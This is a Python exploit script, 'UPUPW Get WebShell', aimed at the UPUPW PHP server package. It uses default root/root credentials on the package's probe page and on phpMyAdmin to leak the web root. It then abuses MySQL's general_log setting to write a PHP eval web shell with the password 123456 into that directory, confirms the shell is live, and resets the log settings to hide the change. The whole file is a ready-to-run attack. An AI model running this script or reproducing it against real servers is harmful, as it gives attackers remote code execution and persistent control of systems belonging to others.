#!/usr/bin/env python
# -*- coding: utf-8 -*-
# UPUPW Get WebShell
import hashlib
import re
import requests
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
shellpass = "123456"
signature = hashlib.md5(b"POC").hexdigest()
shellcode = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,)
shellname = str(int(time.time())) + ".php"
def exploit(target):
doc_root = get_doc_root(target)
if not doc_root:
return False
shell = get_shell(target, doc_root)
if not shell:
return False
else:
return shell
def get_doc_root(target):
URL = target + "/u.php"
try:
r = requests.post(URL, data={"mysqlDb": "test", "mysqlUser": "root", "mysqlPassword": "root", "act": "", }, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
return False
else:
r.encoding = "utf-8"
if sys.version_info.major == 2:
m = re.search(r'<td class="er">当前网站目录</td>\s+<td class="fl">(.+)</td>'.decode("utf_8"), r.text)
else:
m = re.search(r'<td class="er">当前网站目录</td>\s+<td class="fl">(.+)</td>', r.text)
if not m:
return False
else:
return m.group(1).replace("\\", "/")
def get_shell(target, doc_root):
URL_index = target + "/pmd/index.php"
URL_import = target + "/pmd/import.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"}
s = requests.Session()
try:
r = s.post(URL_index, data={"pma_username": "root", "pma_password": "root"}, headers=headers, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
return False
else:
m = re.search(r'<div id="pmalogo">\s+<a href="index.php\?token=([^">]+)">', r.text)
if not m:
return False
else:
token = m.group(1)
try:
related_to_general_log = True
sql_query1 = "SHOW VARIABLES LIKE 'general_log%';"
r1 = s.post(URL_import, data={"token": token, "sql_query": sql_query1}, headers=headers, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
related_to_general_log = False
try:
sql_query2 = "SET GLOBAL general_log = ON;SET GLOBAL general_log_file = '%s/%s';SELECT '%s';" % (doc_root, shellname, shellcode)
r2 = s.post(URL_import, data={"token": token, "sql_query": sql_query2}, headers=headers, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
return False
else:
shell = check_shell(target)
if not shell:
return False
else:
if related_to_general_log:
try:
general_log, general_log_file = ("", "")
general_log, general_log_file = re.findall(r'<td class="data grid_edit ">(.+)</td>', r1.text)
except ValueError as e:
sql_query3 = "SET GLOBAL general_log = OFF;"
else:
sql_query3 = "SET GLOBAL general_log = %s;SET GLOBAL general_log_file = '%s';" % (general_log, general_log_file.replace("\\", "\\\\"))
finally:
try:
r3 = s.post(URL_import, data={"token": token, "sql_query": sql_query3}, headers=headers, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
pass
return shell
def check_shell(target):
URL = target + "/" + shellname
try:
r = requests.get(URL, verify=False, timeout=5)
except requests.exceptions.RequestException as e:
return False
else:
if signature not in r.text:
return False
else:
return URL + ", " + shellpass
def main():
try:
target = sys.argv[1]
except IndexError as e:
print("UPUPW Get WebShell")
else:
result = exploit(target)
print(result)
if __name__ == "__main__":
main()